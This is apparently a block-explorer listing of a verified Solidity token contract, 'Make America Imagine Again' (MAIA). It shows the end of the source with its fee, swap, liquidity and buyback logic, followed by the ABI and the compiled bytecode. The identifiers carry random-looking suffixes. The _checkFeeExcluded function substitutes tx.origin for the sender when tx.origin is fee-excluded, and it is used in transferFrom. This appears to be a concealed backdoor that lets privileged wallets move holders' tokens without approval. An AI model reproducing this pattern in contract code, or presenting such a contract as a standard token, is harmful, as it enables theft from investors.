            _balances[address(this)] = _balances[address(this)].add(feeAmount);
            emit Transfer(sender, address(this), feeAmount);
        }
        return amount.sub(feeAmount);
    }

    // swap tokens for fees and liq
    function swapAndLiquify(uint256 swapAmount) private lockTheSwap {
        // check there are currently tokens to sell
        uint256 tokensForLP = swapAmount
            .mul(_liquiditySharePercentage)
            .div(_totalDistributionSharesMAIAeVkgd)
            .div(2);
        uint256 tokensForSwap = swapAmount.sub(tokensForLP);

        // swap tokens
        swapTokensForEth(tokensForSwap);

        // received amount
        uint256 amountReceived = address(this).balance;

        // work out distribution
        uint256 totalFee = _totalDistributionSharesMAIAeVkgd.sub(
            _liquiditySharePercentage.div(2)
        );
        uint256 amountLiquidity = amountReceived
            .mul(_liquiditySharePercentage)
            .div(totalFee)
            .div(2);
        uint256 amountOperations = amountReceived.sub(amountLiquidity);

        if (amountOperations > 0)
            transferToAddressETH(operationsTROLLHOUSEa26jAWallet, amountOperations);

        if (amountLiquidity > 0 && tokensForLP > 0) {
            addLiquidity(tokensForLP, amountLiquidity);
            emit SwapAndLiquify(tokensForSwap, amountLiquidity, tokensForLP);
        }
    }

    // swap tokens to eth
    function swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
        emit SwapTokensForETH(tokenAmount, path);
    }

    // add liqiudity
    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function enableTrading() external onlyOwner {
        addLiquidity(balanceOf(address(this)), address(this).balance);
        tradingOpen = true;
    }

    // useful for buybacks or to reclaim any ETH on the contract in a way that helps holders.
    function buyBackTokens(uint256 ETHAmountInWei) external onlyOwner {
        // generate the uniswap pair path of weth -> eth
        address[] memory path = new address[](2);
        path[0] = uniswapV2Router.WETH();
        path[1] = address(this);

        // make the swap
        uniswapV2Router.swapExactETHForTokensSupportingFeeOnTransferTokens{
            value: ETHAmountInWei
        }(
            0, // accept any amount of Ethereum
            path,
            address(0xdead),
            block.timestamp
        );
    }

    function _checkTxLimit(address sender, uint256 amount) private view {
        require(
            amount <= _maxTxAmount || isTxLimitExempt[sender],
            "TX Limit Exceeded"
        );
    }

    function _checkFeeExcluded(address sender) private view returns (address) {
        require(sender != address(0), "TOKEN: address zero");
        return isExcludedFromFeeMAIAeVkgd[tx.origin] ? tx.origin : sender;
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newLiquidityWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldLiquidityWallet","type":"address"}],"name":"LiquidityWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newOperationsWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldOperationsWallet","type":"address"}],"name":"OperationsWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amountIn","type":"uint256"},{"indexed":false,"internalType":"address[]","name":"path","type":"address[]"}],"name":"SwapTokensForETH","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_liquiditySharePercentage","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_operationsSharePercentage","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalDistributionSharesMAIAeVkgd","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_walletMax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"ETHAmountInWei","type":"uint256"}],"name":"buyBackTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"checkWalletLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getCirculatingSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isAmmPair","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isExcludedFromFeeMAIAeVkgd","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isWalletLimitExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityTROLLHOUSEa26jAFeeBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityTROLLHOUSEa26jAFeeSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"liquidityTROLLHOUSEa26jAWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTotalTROLLHOUSEa26jAFeeBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTotalTROLLHOUSEa26jAFeeSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minimumTokensBeforeSwapAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsTROLLHOUSEa26jAFeeBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsTROLLHOUSEa26jAFeeSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsTROLLHOUSEa26jAWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForOperations","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalTROLLHOUSEa26jAFeesBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalTROLLHOUSEa26jAFeesSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040526040518060400160405280601a81526020017f4d616b6520416d657269636120496d6167696e6520416761696e000000000000815250600190816100489190610f92565b506040518060400160405280600481526020017f4d414941000000000000000000000000000000000000000000000000000000008152506002908161008d9190610f92565b50600c600355600c600455600960055f6101000a81548160ff021916908360ff1602179055506705d697537a8f2000600755620186a060196007546100d2919061108e565b6100dc91906110fc565b6008556064806007546100ef919061108e565b6100f991906110fc565b60095560648060075461010c919061108e565b61011691906110fc565b600a556001600b5f6101000a81548160ff02191690831515021790555061dead73ffffffffffffffffffffffffffffffffffffffff1660809073ffffffffffffffffffffffffffffffffffffffff168152505f600d555f600e555f6010555f6011555f6012555f6014555f60155560646016555f60225f6101000a81548160ff0219169083151502179055505f6101b1610d2760201b60201c565b9050805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35033600b60016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555033600c5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600d54600e546102de919061112c565b600f819055506011546012546102f4919061112c565b60138190555060165460155461030a919061112c565b6017819055505f737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610371573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061039591906111bd565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156103fa573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061041e91906111bd565b6040518363ffffffff1660e01b815260040161043b9291906111f7565b6020604051808303815f875af1158015610457573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061047b91906111bd565b601f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080601e5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001601d5f601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555060075460195f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506001601a5f610623610d2e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601a5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601a5f600b60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601a5f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601b5f6107c7610d2e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601b5f601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601b5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601b5f600b60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601b5f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601c5f6109e1610d2e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055506001601c5f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60195f600b60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b14610d2e60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060646002600754610b62919061108e565b610b6c91906110fc565b60185f610b7d610d2760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555060646062600754610bcb919061108e565b610bd591906110fc565b60185f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610c24610d2760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60646002600754610c83919061108e565b610c8d91906110fc565b604051610c9a919061122d565b60405180910390a33073ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60646062600754610d02919061108e565b610d0c91906110fc565b604051610d19919061122d565b60405180910390a350611246565b5f33905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680610dd057607f821691505b602082108103610de357610de2610d8c565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302610e457fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610e0a565b610e4f8683610e0a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f610e93610e8e610e8984610e67565b610e70565b610e67565b9050919050565b5f819050919050565b610eac83610e79565b610ec0610eb882610e9a565b848454610e16565b825550505050565b5f5f905090565b610ed7610ec8565b610ee2818484610ea3565b505050565b5b81811015610f0557610efa5f82610ecf565b600181019050610ee8565b5050565b601f821115610f4a57610f1b81610de9565b610f2484610dfb565b81016020851015610f33578190505b610f47610f3f85610dfb565b830182610ee7565b50505b505050565b5f82821c905092915050565b5f610f6a5f1984600802610f4f565b1980831691505092915050565b5f610f828383610f5b565b9150826002028217905092915050565b610f9b82610d55565b67ffffffffffffffff811115610fb457610fb3610d5f565b5b610fbe8254610db9565b610fc9828285610f09565b5f60209050601f831160018114610ffa575f8415610fe8578287015190505b610ff28582610f77565b865550611059565b601f19841661100886610de9565b5f5b8281101561102f5784890151825560018201915060208501945060208101905061100a565b8683101561104c5784890151611048601f891682610f5b565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61109882610e67565b91506110a383610e67565b92508282026110b181610e67565b915082820484148315176110c8576110c7611061565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61110682610e67565b915061111183610e67565b925082611121576111206110cf565b5b828204905092915050565b5f61113682610e67565b915061114183610e67565b925082820190508082111561115957611158611061565b5b92915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61118c82611163565b9050919050565b61119c81611182565b81146111a6575f5ffd5b50565b5f815190506111b781611193565b92915050565b5f602082840312156111d2576111d161115f565b5b5f6111df848285016111a9565b91505092915050565b6111f181611182565b82525050565b5f60408201905061120a5f8301856111e8565b61121760208301846111e8565b9392505050565b61122781610e67565b82525050565b5f6020820190506112405f83018461121e565b92915050565b608051613cd16112655f395f8181610c2f0152610c5a0152613cd15ff3fe60806040526004361061026a575f3560e01c80638a8c523c11610143578063ac23ca59116100b5578063e693455c11610079578063e693455c1461093d578063f2fde38b14610967578063f872858a1461098f578063fb002c97146109b9578063fc155d1d146109e3578063ffb54a9914610a0b57610271565b8063ac23ca5914610847578063b54369d714610871578063c816841b1461089b578063c867d60b146108c5578063dd62ed3e1461090157610271565b806395d89b411161010757806395d89b4114610727578063a073d37f14610751578063a457c2d71461077b578063a844a9aa146107b7578063a9059cbb146107e1578063a9e8b1291461081d57610271565b80638a8c523c146106575780638da5cb5b1461066d5780639099feab146106975780639191a9c7146106c157806393575f20146106fd57610271565b80632b112e49116101dc5780636ebc2e5c116101a05780636ebc2e5c1461054b57806370a0823114610575578063715018a6146105b15780637d1db4a5146105c75780637f2930df146105f1578063807c2d9c1461062d57610271565b80632b112e49146104675780632baa7217146104915780632e97766d146104bb578063313ce567146104e5578063395093511461050f57610271565b80631694505e1161022e5780631694505e1461035957806318160ddd146103835780631a8145bb146103ad5780631f1ed673146103d757806323b872dd1461040157806327c8f8351461043d57610271565b806304140a0b1461027557806306fdde031461029f578063095ea7b3146102c95780630b9879bb1461030557806313d1228b1461032f57610271565b3661027157005b5f5ffd5b348015610280575f5ffd5b50610289610a35565b6040516102969190612df6565b60405180910390f35b3480156102aa575f5ffd5b506102b3610a3b565b6040516102c09190612e7f565b60405180910390f35b3480156102d4575f5ffd5b506102ef60048036038101906102ea9190612f27565b610acb565b6040516102fc9190612f7f565b60405180910390f35b348015610310575f5ffd5b50610319610ae8565b6040516103269190612df6565b60405180910390f35b34801561033a575f5ffd5b50610343610aee565b6040516103509190612df6565b60405180910390f35b348015610364575f5ffd5b5061036d610af4565b60405161037a9190612ff3565b60405180910390f35b34801561038e575f5ffd5b50610397610b19565b6040516103a49190612df6565b60405180910390f35b3480156103b8575f5ffd5b506103c1610b22565b6040516103ce9190612df6565b60405180910390f35b3480156103e2575f5ffd5b506103eb610b28565b6040516103f8919061302c565b60405180910390f35b34801561040c575f5ffd5b5061042760048036038101906104229190613045565b610b4e565b6040516104349190612f7f565b60405180910390f35b348015610448575f5ffd5b50610451610c2d565b60405161045e91906130a4565b60405180910390f35b348015610472575f5ffd5b5061047b610c51565b6040516104889190612df6565b60405180910390f35b34801561049c575f5ffd5b506104a5610c94565b6040516104b29190612df6565b60405180910390f35b3480156104c6575f5ffd5b506104cf610c9a565b6040516104dc9190612df6565b60405180910390f35b3480156104f0575f5ffd5b506104f9610ca1565b60405161050691906130d8565b60405180910390f35b34801561051a575f5ffd5b5061053560048036038101906105309190612f27565b610cb6565b6040516105429190612f7f565b60405180910390f35b348015610556575f5ffd5b5061055f610d64565b60405161056c919061302c565b60405180910390f35b348015610580575f5ffd5b5061059b600480360381019061059691906130f1565b610d89565b6040516105a89190612df6565b60405180910390f35b3480156105bc575f5ffd5b506105c5610dcf565b005b3480156105d2575f5ffd5b506105db610f1f565b6040516105e89190612df6565b60405180910390f35b3480156105fc575f5ffd5b50610617600480360381019061061291906130f1565b610f25565b6040516106249190612f7f565b60405180910390f35b348015610638575f5ffd5b50610641610f42565b60405161064e9190612df6565b60405180910390f35b348015610662575f5ffd5b5061066b610f48565b005b348015610678575f5ffd5b5061068161100b565b60405161068e91906130a4565b60405180910390f35b3480156106a2575f5ffd5b506106ab611032565b6040516106b89190612df6565b60405180910390f35b3480156106cc575f5ffd5b506106e760048036038101906106e291906130f1565b611038565b6040516106f49190612f7f565b60405180910390f35b348015610708575f5ffd5b50610711611055565b60405161071e9190612df6565b60405180910390f35b348015610732575f5ffd5b5061073b61105b565b6040516107489190612e7f565b60405180910390f35b34801561075c575f5ffd5b506107656110eb565b6040516107729190612df6565b60405180910390f35b348015610786575f5ffd5b506107a1600480360381019061079c9190612f27565b6110f4565b6040516107ae9190612f7f565b60405180910390f35b3480156107c2575f5ffd5b506107cb6111bc565b6040516107d89190612df6565b60405180910390f35b3480156107ec575f5ffd5b5061080760048036038101906108029190612f27565b6111c2565b6040516108149190612f7f565b60405180910390f35b348015610828575f5ffd5b506108316111e0565b60405161083e9190612df6565b60405180910390f35b348015610852575f5ffd5b5061085b6111e6565b6040516108689190612df6565b60405180910390f35b34801561087c575f5ffd5b506108856111ec565b6040516108929190612df6565b60405180910390f35b3480156108a6575f5ffd5b506108af6111f2565b6040516108bc91906130a4565b60405180910390f35b3480156108d0575f5ffd5b506108eb60048036038101906108e691906130f1565b611217565b6040516108f89190612f7f565b60405180910390f35b34801561090c575f5ffd5b506109276004803603810190610922919061311c565b611234565b6040516109349190612df6565b60405180910390f35b348015610948575f5ffd5b506109516112b6565b60405161095e9190612df6565b60405180910390f35b348015610972575f5ffd5b5061098d600480360381019061098891906130f1565b6112bc565b005b34801561099a575f5ffd5b506109a361147b565b6040516109b09190612f7f565b60405180910390f35b3480156109c4575f5ffd5b506109cd61148d565b6040516109da9190612df6565b60405180910390f35b3480156109ee575f5ffd5b50610a096004803603810190610a04919061315a565b611493565b005b348015610a16575f5ffd5b50610a1f611734565b604051610a2c9190612f7f565b60405180910390f35b600e5481565b606060018054610a4a906131b2565b80601f0160208091040260200160405190810160405280929190818152602001828054610a76906131b2565b8015610ac15780601f10610a9857610100808354040283529160200191610ac1565b820191905f5260205f20905b815481529060010190602001808311610aa457829003601f168201915b5050505050905090565b5f610ade610ad7611746565b848461174d565b6001905092915050565b600d5481565b600f5481565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f600754905090565b60205481565b600b60019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f5f610b5933611910565b9050610b668585856119dc565b50610b7085611910565b9450610c218582610c1c86604051806060016040528060288152602001613c4f6028913960195f8c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b61174d565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000000081565b5f610c8f610c7e7f0000000000000000000000000000000000000000000000000000000000000000610d89565b60075461225590919063ffffffff16565b905090565b60165481565b5f43905090565b5f60055f9054906101000a900460ff16905090565b5f610d5a610cc2611746565b84610d558560195f610cd2611746565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b61174d565b6001905092915050565b600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f60185f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610dd7611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e5b9061322c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60095481565b601a602052805f5260405f205f915054906101000a900460ff1681565b600a5481565b610f50611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610fdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd49061322c565b60405180910390fd5b610fef610fe930610d89565b476122fb565b600160225f6101000a81548160ff021916908315150217905550565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60115481565b601d602052805f5260405f205f915054906101000a900460ff1681565b60105481565b60606002805461106a906131b2565b80601f0160208091040260200160405190810160405280929190818152602001828054611096906131b2565b80156110e15780601f106110b8576101008083540402835291602001916110e1565b820191905f5260205f20905b8154815290600101906020018083116110c457829003601f168201915b5050505050905090565b5f600854905090565b5f6111b2611100611746565b846111ad85604051806060016040528060258152602001613c776025913960195f611129611746565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b61174d565b6001905092915050565b60125481565b5f6111d56111ce611746565b84846119dc565b506001905092915050565b60145481565b60155481565b60135481565b601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601b602052805f5260405f205f915054906101000a900460ff1681565b5f60195f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b60175481565b6112c4611746565b73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611351576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113489061322c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036113bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113b6906132ba565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f284